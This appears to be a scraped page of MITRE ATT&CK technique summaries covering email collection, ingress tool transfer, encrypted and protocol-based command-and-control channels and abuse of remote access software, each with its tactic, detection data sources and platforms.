Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre